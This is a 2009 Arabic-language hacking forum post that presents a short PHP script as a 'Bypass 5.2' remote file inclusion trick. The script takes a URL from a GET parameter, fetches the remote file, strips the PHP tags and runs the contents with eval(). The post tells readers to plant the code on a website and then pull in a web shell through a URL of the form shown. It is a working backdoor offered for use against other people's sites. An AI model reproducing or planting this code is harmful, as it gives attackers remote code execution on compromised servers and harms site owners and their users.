:: vBspiders Professional Network :: - عرض مشاركة واحدة

Crazy Dz · 07-26-2009, 06:14 AM

سلام عليكم

كود PHP:

  <?php
/*
 ************************
 * Include any File php *
 * PHP (Bypass 5.2.*)   *
 ************************
 * Coded By AL-MoGrM    *
 * T0v@hotmail.Com      *
 ************************
*/
if($_GET[t0v]){
$file=implode("\n",file($_GET[t0v]));
$t0v=str_replace("<?php", "",$file);
$t0v=str_replace("<?", "",$t0v);
$t0v=str_replace("?>", "",$t0v);
eval($t0v);
}
?>

الشرح :- ثغره في php تسمح لك تسحب اي ملف php من خارج السيرفر لان الاصدارات الجديده مانعه السحب
لغم الموقع بالكود هذا واسحب الشل بالطريقه ذي
http://site.com/file.php?t0v=http://...mages/Ex/r.txt

المصدر SecurityReason

المصدر: :: vBspiders Professional Network ::

PHP 5>2>* Bypass Remote File Inclusion)